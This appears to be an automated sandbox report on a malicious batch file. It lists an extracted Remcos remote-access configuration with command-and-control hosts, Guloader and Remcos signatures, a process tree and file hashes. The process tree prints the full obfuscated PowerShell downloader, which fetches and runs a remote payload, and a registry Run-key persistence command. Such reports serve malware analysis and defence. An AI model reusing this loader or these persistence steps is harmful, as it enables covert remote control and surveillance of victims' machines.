Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/09/2024, 12:59

General

  • Target

    f752c238ed2ec65819ded5e02c778d38649a74e9dce3e706868cdf5509df8f0d.bat

  • Size

    4KB

  • MD5

    9c8f0258761077d7f288b26b01573037

  • SHA1

    931504788ecaea4dd3f2943b3cf9ac2a21a22f25

  • SHA256

    f752c238ed2ec65819ded5e02c778d38649a74e9dce3e706868cdf5509df8f0d

  • SHA512

    88db0b9a290435d22a55f5c16258cb5eb2c91cf28a2a92ca252ef6b8b654ecea9112c1cad3c1d78b892fb1ee09749e87877a094f024192ac5331390e9d767e81

  • SSDEEP

    96:41jj+2I5lNSvALeDnZaI4pa9YUDjH+Xrn3Qna5:O290IL41cYYUjeXTp

Malware Config

Extracted

Family

remcos

Botnet

Wealthabundance

C2

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-5O4NY3

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f752c238ed2ec65819ded5e02c778d38649a74e9dce3e706868cdf5509df8f0d.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Multiversion='servicekontrakternes';$Avlers=${host}.Runspace;If ($Avlers) {$evyn++;$Multiversion+='Sklmskes';$Accidental='su';$Multiversion+='Snowman';$Accidental+='bs';$Multiversion+='Afhstes';$Accidental+='tri';$Multiversion+='Torturingly16';$Accidental+='ng';};Function Skkevogn($Steamrollers146){$Kautionisten=$Steamrollers146.Length-$evyn;For( $Basunere=2;$Basunere -lt $Kautionisten;$Basunere+=3){$Srlovgivnings+=$Steamrollers146.$Accidental.'Invoke'( $Basunere, $evyn);}$Srlovgivnings;}function chondriomere($Dikaryophasic){ . ($Havestuens) ($Dikaryophasic);}$Slagterhunden=Skkevogn ' .MI,o AzKaiCulSklMia / ,5Hi. F0Ar Br(,oWL,iVanHad.eoLawResAf D N TTu t 1Fr0.e. ,0Pu;M. M.WC.i ,n ,6Xy4Pi;St h.xna6 i4Ca; e SkrImvFy:Ex1Cu2Su1A.. L0 .)M. EnGDoe cKrkStoEf/.r2 e0eb1Ar0Ek0Me1Sp0 .1 W P,FReiCorameP,fDro Kx d/P 1 F2Te1 .F 0 . ';$Mystifying=Skkevogn ' .U DsRueU,rSu- ,A fgNueStnHot,e ';$Bdeniveauer=Skkevogn 'sthSatNot TpSesSk: ./Br/FefN,uSknEtdFaaPacSeiReorhn.eaWirB.r fe .cGuiUdfExeDispr. PovorA gTe/.iiSwm .aH,gMaeRes.l/PiRPra.ud.niPaoVea.ek Rt LiBav,diTytB,eSnt,te.yn CsVa. StSko ocEs> FhK.tTatMip B:Ev/Hr/Cy3 r6Ol.F.5Ev0kl. S1Bl7Ju7E..Ca2.e5 S0 S/BeRHoaInd.liblo TaU,k itCoib vthiMytTaeE tSeeSknDesOn. AtRaoHocFo ';$udbulning=Skkevogn 'T.> u ';$Havestuens=Skkevogn 'Boi .eBexUn ';$Paafuglens='Tsarship';$Fristende = Skkevogn 'K ePec.ehS odi %Poa ,pKopLad va ,tCia.i%K,\ LIS.n ocAgiRetUni,dnSugAn.UdLM,e TdSn Lo&T & U Ble.ucAlhSto , VitIn ';chondriomere (Skkevogn 'H,$DegLglOlonab taB,l S:deTCoo owNonBisE bF,odoy ,=Mi(M,cEpmB dC. S/ vcHe Hv$BoFChrAliEnsQut aeI,nHyd.ne T) , ');chondriomere (Skkevogn 'Na$C,gUnlLoo .bUdaSolP,:bnO emunsPai ydPue ,rZa=G $S,Bemd Me Sn i.ov me ,aE,u BeK.r K.Das p LlIsiUft.o(Mu$Apu.id bTruTrl.gn ,iSrnFogTr)S ');chondriomere (Skkevogn 'Pe[TrN e At.g.UnSVaeTorMivDeiHuc e KPExo .iMdnS t.eMUnaFin aBegSpeVarC.] e: :SpS e Wc Bu.ar Ci It MyAsPPar .o.ntPlob,cOvoPrl,a V =Ud .[ TNR,eArtSp. S jeZ cShuAurEriFltDayKePRer oo otlao ScGnot l ,TcoySap e E]U :Ho:AnTBylAfs 1 G2So ');$Bdeniveauer=$Omsider[0];$Historietimers178= (Skkevogn 'fo$a.g,nlFeo Vb,iaDel S:AdSSuuAgbRelAfe,aaN,sDei.vnKagF.=L,N peAswMe-CiO ebImj ReFicAatSp M S.eyK s.utC.e Am .. TNIneAmtPo.ArWkaeMebfoC SlHei Be ,n,ft');$Historietimers178+=$Townsboy[1];chondriomere ($Historietimers178);chondriomere (Skkevogn '.l$SlSHiuU.bUllIneHeaAlsaaiPrn GgUt. .HNeeDaaSidO.e Mr fsAs[C,$ MfayR.spatA.ijuf.uyF i PnskgD,]A =Sk$t.SFolteaSkg mtBue.rrPeh.ru Kn PdUde FnBa ');$Biotypes=Skkevogn 'ov$FoS,nuAvbAflInePla LsEkiConEngMo.E.DR.o,lwCen.rlSio UaVedG FBuiR,lPoe C(R.$,iBUndM.e,vn,ei Sv eO a AuFoeSkrIn, G$P,S Pm.omExoLam .eIrtT.eBjr.vsV,) H ';$Smmometers=$Townsboy[0];chondriomere (Skkevogn 'D,$Teg l AoItbFea ,l l:TrNS.y ouSad.odimaMenKan.aeSotGa9Br8 y=Be(i T ,eWhsAnt .-AaP gaeltKohbi Gl$T S OmFym oo SmSkeA.tChe ArL,s ,)Ti ');while (!$Nyuddannet98) {chondriomere (Skkevogn 'st$DigStl roOpb IaColSv:WoCReo cnUncYaee nDetHouNeaHulAp= $b.t.trAtuCoeD ') ;chondriomere $Biotypes;chondriomere (Skkevogn 'SeS t PaC r tst-a.SRulF,e,reKrpIm Oc4 o ');chondriomere (Skkevogn '.g$ ,gUnlPro Sb OaEml .:naNo.y Au.rd .dfraSenG nB.eSitIn9Ch8Lo=Mb(IsT UeMisC,tPr-PoPBoa.it UhTr Bo$.eSClm .m UoUnmIne.et Aeo,rD,sAu)F. ') ;chondriomere (Skkevogn 'De$adg.llNooVib a OlI.: eN FoAvn d heSuaTif leBenFii ,n,ag E1Mu8B,5 .= o$ ,gStl.eo.eb .a PlTr:.aMgru IsudeTatexyTrf ,uM.sSt+p +Na%ph$G.OFimF sSiid.d .eKrrS,. .cFooCru DnkotNo ') ;$Bdeniveauer=$Omsider[$Nondeafening185];}$Brownistic=294954;$maxillojugal=28197;chondriomere (Skkevogn ' u$SegRol .o bKaaAslTr: TA,iq UuGraS.tU iRonAltHje AdUa r=Ce BGble kt S- FCBloBon Tt.ne Sn ,tSi Ta$BoSGlm umLioXamGre ItPheFarC s.e ');chondriomere (Skkevogn 'Ba$D,gBll.aoB,bB.aselSy:P USmnTuc,pl,eaRenIld eVisretUli.rnPaeEmlL,y l Wi=In [poSGayBls ,t,iesumB,. vC PoQunCivTre Srnet S]To:D.:,aFperT,o,ym,aBA,a ,s.neTr6He4SpSadtMirHaiPinMegM.(Gi$ElATrq u .aBetE iC,nCotR eKrdUd)Re ');chondriomere (Skkevogn 'Sa$hvg AlMio HbV a ,lSj:KoV seFunPisF.t VrDieOrsB.o Pc siSiaDilm.iKrsUdtFleAerFosCl St=Sk Ke[ oS.ayodsU,tFleSnm.l. VTPreLax,ot.n.ReE tn,kcHio ,dPii,unM,g .]T.: ,: eAVaS ,CUdIT.I.i.OmGSueD.tS SSntPsrBai,nn igSk(Gl$PaU AnR.c KlI aRanPodBle FsSltToiB nnoeN lP.yF ),n ');chondriomere (Skkevogn '.e$WogI lBeoSpbNea,el m:U S DtSueSvm ,m heudp erCoaT,gHot PsR =U $afVCheSpnInst,t ErOveAns .oSkcFoiPha TlBli,dsT.tmieO.rossUn.Bus,au bOcsE,tT,rSoiU n ,gBl(kr$ OB .rInoHiwmen DidrsEct BiEjcOl,Fo$VimRlaG x Di,ulTal BoPrj .u,lg.oaUnl M)Cl ');chondriomere $Stemmepragts;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4872
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Inciting.Led && echo t"
        3⤵
          PID:2720
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Multiversion='servicekontrakternes';$Avlers=${host}.Runspace;If ($Avlers) {$evyn++;$Multiversion+='Sklmskes';$Accidental='su';$Multiversion+='Snowman';$Accidental+='bs';$Multiversion+='Afhstes';$Accidental+='tri';$Multiversion+='Torturingly16';$Accidental+='ng';};Function Skkevogn($Steamrollers146){$Kautionisten=$Steamrollers146.Length-$evyn;For( $Basunere=2;$Basunere -lt $Kautionisten;$Basunere+=3){$Srlovgivnings+=$Steamrollers146.$Accidental.'Invoke'( $Basunere, $evyn);}$Srlovgivnings;}function chondriomere($Dikaryophasic){ . ($Havestuens) ($Dikaryophasic);}$Slagterhunden=Skkevogn ' .MI,o AzKaiCulSklMia / ,5Hi. F0Ar Br(,oWL,iVanHad.eoLawResAf D N TTu t 1Fr0.e. ,0Pu;M. M.WC.i ,n ,6Xy4Pi;St h.xna6 i4Ca; e SkrImvFy:Ex1Cu2Su1A.. L0 .)M. EnGDoe cKrkStoEf/.r2 e0eb1Ar0Ek0Me1Sp0 .1 W P,FReiCorameP,fDro Kx d/P 1 F2Te1 .F 0 . ';$Mystifying=Skkevogn ' .U DsRueU,rSu- ,A fgNueStnHot,e ';$Bdeniveauer=Skkevogn 'sthSatNot TpSesSk: ./Br/FefN,uSknEtdFaaPacSeiReorhn.eaWirB.r fe .cGuiUdfExeDispr. PovorA gTe/.iiSwm .aH,gMaeRes.l/PiRPra.ud.niPaoVea.ek Rt LiBav,diTytB,eSnt,te.yn CsVa. StSko ocEs> FhK.tTatMip B:Ev/Hr/Cy3 r6Ol.F.5Ev0kl. S1Bl7Ju7E..Ca2.e5 S0 S/BeRHoaInd.liblo TaU,k itCoib vthiMytTaeE tSeeSknDesOn. AtRaoHocFo ';$udbulning=Skkevogn 'T.> u ';$Havestuens=Skkevogn 'Boi .eBexUn ';$Paafuglens='Tsarship';$Fristende = Skkevogn 'K ePec.ehS odi %Poa ,pKopLad va ,tCia.i%K,\ LIS.n ocAgiRetUni,dnSugAn.UdLM,e TdSn Lo&T & U Ble.ucAlhSto , VitIn ';chondriomere (Skkevogn 'H,$DegLglOlonab taB,l S:deTCoo owNonBisE bF,odoy ,=Mi(M,cEpmB dC. S/ vcHe Hv$BoFChrAliEnsQut aeI,nHyd.ne T) , ');chondriomere (Skkevogn 'Na$C,gUnlLoo .bUdaSolP,:bnO emunsPai ydPue ,rZa=G $S,Bemd Me Sn i.ov me ,aE,u BeK.r K.Das p LlIsiUft.o(Mu$Apu.id bTruTrl.gn ,iSrnFogTr)S ');chondriomere (Skkevogn 'Pe[TrN e At.g.UnSVaeTorMivDeiHuc e KPExo .iMdnS t.eMUnaFin aBegSpeVarC.] e: :SpS e Wc Bu.ar Ci It MyAsPPar .o.ntPlob,cOvoPrl,a V =Ud .[ TNR,eArtSp. S jeZ cShuAurEriFltDayKePRer oo otlao ScGnot l ,TcoySap e E]U :Ho:AnTBylAfs 1 G2So ');$Bdeniveauer=$Omsider[0];$Historietimers178= (Skkevogn 'fo$a.g,nlFeo Vb,iaDel S:AdSSuuAgbRelAfe,aaN,sDei.vnKagF.=L,N peAswMe-CiO ebImj ReFicAatSp M S.eyK s.utC.e Am .. TNIneAmtPo.ArWkaeMebfoC SlHei Be ,n,ft');$Historietimers178+=$Townsboy[1];chondriomere ($Historietimers178);chondriomere (Skkevogn '.l$SlSHiuU.bUllIneHeaAlsaaiPrn GgUt. .HNeeDaaSidO.e Mr fsAs[C,$ MfayR.spatA.ijuf.uyF i PnskgD,]A =Sk$t.SFolteaSkg mtBue.rrPeh.ru Kn PdUde FnBa ');$Biotypes=Skkevogn 'ov$FoS,nuAvbAflInePla LsEkiConEngMo.E.DR.o,lwCen.rlSio UaVedG FBuiR,lPoe C(R.$,iBUndM.e,vn,ei Sv eO a AuFoeSkrIn, G$P,S Pm.omExoLam .eIrtT.eBjr.vsV,) H ';$Smmometers=$Townsboy[0];chondriomere (Skkevogn 'D,$Teg l AoItbFea ,l l:TrNS.y ouSad.odimaMenKan.aeSotGa9Br8 y=Be(i T ,eWhsAnt .-AaP gaeltKohbi Gl$T S OmFym oo SmSkeA.tChe ArL,s ,)Ti ');while (!$Nyuddannet98) {chondriomere (Skkevogn 'st$DigStl roOpb IaColSv:WoCReo cnUncYaee nDetHouNeaHulAp= $b.t.trAtuCoeD ') ;chondriomere $Biotypes;chondriomere (Skkevogn 'SeS t PaC r tst-a.SRulF,e,reKrpIm Oc4 o ');chondriomere (Skkevogn '.g$ ,gUnlPro Sb OaEml .:naNo.y Au.rd .dfraSenG nB.eSitIn9Ch8Lo=Mb(IsT UeMisC,tPr-PoPBoa.it UhTr Bo$.eSClm .m UoUnmIne.et Aeo,rD,sAu)F. ') ;chondriomere (Skkevogn 'De$adg.llNooVib a OlI.: eN FoAvn d heSuaTif leBenFii ,n,ag E1Mu8B,5 .= o$ ,gStl.eo.eb .a PlTr:.aMgru IsudeTatexyTrf ,uM.sSt+p +Na%ph$G.OFimF sSiid.d .eKrrS,. .cFooCru DnkotNo ') ;$Bdeniveauer=$Omsider[$Nondeafening185];}$Brownistic=294954;$maxillojugal=28197;chondriomere (Skkevogn ' u$SegRol .o bKaaAslTr: TA,iq UuGraS.tU iRonAltHje AdUa r=Ce BGble kt S- FCBloBon Tt.ne Sn ,tSi Ta$BoSGlm umLioXamGre ItPheFarC s.e ');chondriomere (Skkevogn 'Ba$D,gBll.aoB,bB.aselSy:P USmnTuc,pl,eaRenIld eVisretUli.rnPaeEmlL,y l Wi=In [poSGayBls ,t,iesumB,. vC PoQunCivTre Srnet S]To:D.:,aFperT,o,ym,aBA,a ,s.neTr6He4SpSadtMirHaiPinMegM.(Gi$ElATrq u .aBetE iC,nCotR eKrdUd)Re ');chondriomere (Skkevogn 'Sa$hvg AlMio HbV a ,lSj:KoV seFunPisF.t VrDieOrsB.o Pc siSiaDilm.iKrsUdtFleAerFosCl St=Sk Ke[ oS.ayodsU,tFleSnm.l. VTPreLax,ot.n.ReE tn,kcHio ,dPii,unM,g .]T.: ,: eAVaS ,CUdIT.I.i.OmGSueD.tS SSntPsrBai,nn igSk(Gl$PaU AnR.c KlI aRanPodBle FsSltToiB nnoeN lP.yF ),n ');chondriomere (Skkevogn '.e$WogI lBeoSpbNea,el m:U S DtSueSvm ,m heudp erCoaT,gHot PsR =U $afVCheSpnInst,t ErOveAns .oSkcFoiPha TlBli,dsT.tmieO.rossUn.Bus,au bOcsE,tT,rSoiU n ,gBl(kr$ OB .rInoHiwmen DidrsEct BiEjcOl,Fo$VimRlaG x Di,ulTal BoPrj .u,lg.oaUnl M)Cl ');chondriomere $Stemmepragts;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • System Time Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3668
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Inciting.Led && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2876
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
              PID:3820
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:4968
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:1404
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  4⤵
                    PID:3924
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe"
                    4⤵
                      PID:3920
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe"
                      4⤵
                        PID:4504
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe"
                        4⤵
                          PID:4924
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          4⤵
                            PID:3868
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            4⤵
                              PID:3964
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              4⤵
                                PID:3968
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe"
                                4⤵
                                  PID:3656
                                • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                  "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                  4⤵
                                    PID:4644
                                  • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                    "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                    4⤵
                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    • Suspicious use of WriteProcessMemory
                                    PID:2588
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Shawlless" /t REG_EXPAND_SZ /d "%Snyltegsterne% -w 1 $Quells=(Get-ItemProperty -Path 'HKCU:\Panatela\').Hogged;%Snyltegsterne% ($Quells)"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:2516
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Shawlless" /t REG_EXPAND_SZ /d "%Snyltegsterne% -w 1 $Quells=(Get-ItemProperty -Path 'HKCU:\Panatela\').Hogged;%Snyltegsterne% ($Quells)"
                                        6⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        • Modifies registry key
                                        PID:3496

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p0tft0ju.sn2.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Roaming\Inciting.Led

                              Filesize

                              420KB

                              MD5

                              683ec0fd599284a3b88f5dc0fd0e2dc7

                              SHA1

                              4d9eb72b652903e6b0d8b28185540929e3d385ca

                              SHA256

                              81de780cd69365db142df90592938ac3bbe44bc4dca87926b7a38595d02ab0ff

                              SHA512

                              6830b0ad55e2573678ff6f34cc4f09ef5a82ce00f8f98b0403f5aede3b2ce9dec35d102536486e0124709481226f5988dc8cb6aecfff75d78a45e30b7df25703

                            • memory/2588-61-0x0000000000BA0000-0x00000000054D0000-memory.dmp

                              Filesize

                              73.2MB

                            • memory/2588-60-0x0000000000400000-0x00000000005E4000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/2588-57-0x0000000000400000-0x00000000005E4000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/3668-30-0x00000000054D0000-0x0000000005536000-memory.dmp

                              Filesize

                              408KB

                            • memory/3668-41-0x0000000005B20000-0x0000000005B3E000-memory.dmp

                              Filesize

                              120KB

                            • memory/3668-62-0x0000000074600000-0x0000000074DB0000-memory.dmp

                              Filesize

                              7.7MB

                            • memory/3668-51-0x000000007460E000-0x000000007460F000-memory.dmp

                              Filesize

                              4KB

                            • memory/3668-52-0x0000000074600000-0x0000000074DB0000-memory.dmp

                              Filesize

                              7.7MB

                            • memory/3668-49-0x0000000008490000-0x000000000CDC0000-memory.dmp

                              Filesize

                              73.2MB

                            • memory/3668-23-0x000000007460E000-0x000000007460F000-memory.dmp

                              Filesize

                              4KB

                            • memory/3668-24-0x00000000045B0000-0x00000000045E6000-memory.dmp

                              Filesize

                              216KB

                            • memory/3668-25-0x0000000074600000-0x0000000074DB0000-memory.dmp

                              Filesize

                              7.7MB

                            • memory/3668-26-0x0000000074600000-0x0000000074DB0000-memory.dmp

                              Filesize

                              7.7MB

                            • memory/3668-27-0x0000000004C20000-0x0000000005248000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/3668-28-0x0000000005290000-0x00000000052B2000-memory.dmp

                              Filesize

                              136KB

                            • memory/3668-29-0x0000000005330000-0x0000000005396000-memory.dmp

                              Filesize

                              408KB

                            • memory/3668-47-0x0000000007EE0000-0x0000000008484000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/3668-40-0x0000000005540000-0x0000000005894000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/3668-46-0x0000000006B40000-0x0000000006B62000-memory.dmp

                              Filesize

                              136KB

                            • memory/3668-42-0x0000000005B50000-0x0000000005B9C000-memory.dmp

                              Filesize

                              304KB

                            • memory/3668-43-0x00000000072B0000-0x000000000792A000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3668-44-0x00000000060A0000-0x00000000060BA000-memory.dmp

                              Filesize

                              104KB

                            • memory/3668-45-0x0000000006E30000-0x0000000006EC6000-memory.dmp

                              Filesize

                              600KB

                            • memory/4872-16-0x00007FFF12633000-0x00007FFF12635000-memory.dmp

                              Filesize

                              8KB

                            • memory/4872-2-0x00007FFF12633000-0x00007FFF12635000-memory.dmp

                              Filesize

                              8KB

                            • memory/4872-15-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-22-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-50-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-19-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-18-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-14-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-13-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-17-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4872-3-0x000001E1FF020000-0x000001E1FF042000-memory.dmp

                              Filesize

                              136KB

                            • memory/4872-65-0x00007FFF12630000-0x00007FFF130F1000-memory.dmp

                              Filesize

                              10.8MB